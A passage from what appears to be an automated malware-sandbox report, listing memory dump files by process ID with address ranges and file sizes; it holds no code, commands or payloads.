                                          • memory/772-111-0x0000000000000000-mapping.dmp
                                          • memory/860-99-0x0000000000000000-mapping.dmp
                                          • memory/860-132-0x0000000000000000-mapping.dmp
                                          • memory/880-156-0x0000000000D50000-0x0000000000D56000-memory.dmp
                                            Filesize

                                            24KB

                                          • memory/924-133-0x0000000000000000-mapping.dmp
                                          • memory/932-147-0x0000000000000000-mapping.dmp
                                          • memory/968-80-0x0000000000000000-mapping.dmp
                                          • memory/984-142-0x0000000000000000-mapping.dmp
                                          • memory/984-58-0x0000000000000000-mapping.dmp
                                          • memory/1076-93-0x0000000000000000-mapping.dmp
                                          • memory/1096-138-0x0000000000000000-mapping.dmp
                                          • memory/1096-92-0x0000000000000000-mapping.dmp
                                          • memory/1152-109-0x0000000000000000-mapping.dmp
                                          • memory/1184-69-0x000000001BC60000-0x000000001C07E000-memory.dmp
                                            Filesize

                                            4.1MB

                                          • memory/1184-70-0x000007FEFBEC1000-0x000007FEFBEC3000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1184-68-0x00000000000B0000-0x00000000004CE000-memory.dmp
                                            Filesize

                                            4.1MB

                                          • memory/1188-104-0x0000000000000000-mapping.dmp
                                          • memory/1200-81-0x0000000000000000-mapping.dmp
                                          • memory/1200-100-0x0000000000000000-mapping.dmp
                                          • memory/1208-139-0x0000000000000000-mapping.dmp
                                          • memory/1276-108-0x0000000000000000-mapping.dmp
                                          • memory/1324-103-0x0000000000000000-mapping.dmp
                                          • memory/1332-101-0x0000000000000000-mapping.dmp
                                          • memory/1332-152-0x0000000000000000-mapping.dmp
                                          • memory/1344-106-0x0000000000000000-mapping.dmp
                                          • memory/1352-136-0x0000000000000000-mapping.dmp
                                          • memory/1368-94-0x0000000000000000-mapping.dmp
                                          • memory/1372-90-0x0000000000000000-mapping.dmp
                                          • memory/1384-60-0x0000000000000000-mapping.dmp
                                          • memory/1456-54-0x0000000076631000-0x0000000076633000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1460-151-0x0000000000000000-mapping.dmp
                                          • memory/1460-145-0x0000000000000000-mapping.dmp
                                          • memory/1460-78-0x0000000000000000-mapping.dmp
                                          • memory/1528-86-0x0000000000000000-mapping.dmp
                                          • memory/1572-107-0x0000000000000000-mapping.dmp
                                          • memory/1628-87-0x0000000000000000-mapping.dmp
                                          • memory/1628-137-0x0000000000000000-mapping.dmp
                                          • memory/1640-157-0x0000000000060000-0x0000000000067000-memory.dmp
                                            Filesize

                                            28KB

                                          • memory/1640-159-0x0000000000060000-0x0000000000067000-memory.dmp
                                            Filesize

                                            28KB

                                          • memory/1640-160-0x0000000000280000-0x0000000000286000-memory.dmp
                                            Filesize

                                            24KB

                                          • memory/1684-141-0x0000000000000000-mapping.dmp
                                          • memory/1724-102-0x0000000000000000-mapping.dmp
                                          • memory/1736-96-0x0000000000000000-mapping.dmp
                                          • memory/1748-97-0x0000000000000000-mapping.dmp
                                          • memory/1748-130-0x0000000000000000-mapping.dmp
                                          • memory/1772-148-0x0000000000000000-mapping.dmp
                                          • memory/1772-110-0x0000000000000000-mapping.dmp
                                          • memory/1772-153-0x0000000000000000-mapping.dmp
                                          • memory/1816-135-0x0000000000000000-mapping.dmp
                                          • memory/1828-165-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-169-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-185-0x00000000000E0000-0x0000000000100000-memory.dmp
                                            Filesize

                                            128KB

                                          • memory/1828-183-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-181-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-179-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-178-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-177-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-175-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-173-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-172-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-171-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-167-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-163-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-162-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-184-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1828-186-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1852-125-0x000007FEEC100000-0x000007FEECC5D000-memory.dmp
                                            Filesize

                                            11.4MB

                                          • memory/1852-122-0x0000000000000000-mapping.dmp
                                          • memory/1852-124-0x000007FEECC60000-0x000007FEED683000-memory.dmp
                                            Filesize

                                            10.1MB

                                          • memory/1852-126-0x0000000001014000-0x0000000001017000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/1852-127-0x0000000001014000-0x0000000001017000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/1852-128-0x000000000101B000-0x000000000103A000-memory.dmp
                                            Filesize

                                            124KB

                                          • memory/1912-88-0x0000000000000000-mapping.dmp
                                          • memory/1912-154-0x0000000000000000-mapping.dmp
                                          • memory/1912-149-0x0000000000000000-mapping.dmp
                                          • memory/1928-67-0x00000000774A0000-0x0000000077649000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1928-61-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1928-66-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1928-56-0x0000000000000000-mapping.dmp
                                          • memory/1928-59-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1928-64-0x00000000774A0000-0x0000000077649000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1940-85-0x0000000000000000-mapping.dmp
                                          • memory/1956-116-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1956-146-0x0000000000000000-mapping.dmp
                                          • memory/1956-114-0x0000000000000000-mapping.dmp
                                          • memory/1956-117-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1956-118-0x00000000774A0000-0x0000000077649000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1956-120-0x00000000774A0000-0x0000000077649000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1956-119-0x0000000000400000-0x0000000001063000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1972-113-0x00000000011F0000-0x0000000001E53000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1972-155-0x00000000011F0000-0x0000000001E53000-memory.dmp
                                            Filesize

                                            12.4MB

                                          • memory/1972-84-0x0000000000000000-mapping.dmp
                                          • memory/1992-83-0x0000000000000000-mapping.dmp
                                          • memory/2000-89-0x0000000000000000-mapping.dmp
                                          • memory/2000-105-0x0000000000000000-mapping.dmp
                                          • memory/2000-143-0x0000000000000000-mapping.dmp
                                          • memory/2004-91-0x0000000000000000-mapping.dmp
                                          • memory/2016-71-0x0000000000000000-mapping.dmp
                                          • memory/2016-73-0x000007FEED6B0000-0x000007FEEE0D3000-memory.dmp
                                            Filesize

                                            10.1MB

                                          • memory/2016-77-0x00000000024BB000-0x00000000024DA000-memory.dmp
                                            Filesize

                                            124KB

                                          • memory/2016-74-0x000007FEECB50000-0x000007FEED6AD000-memory.dmp
                                            Filesize

                                            11.4MB

                                          • memory/2016-75-0x00000000024B4000-0x00000000024B7000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/2016-76-0x00000000024B4000-0x00000000024B7000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/2016-140-0x0000000000000000-mapping.dmp
                                          • memory/2020-144-0x0000000000000000-mapping.dmp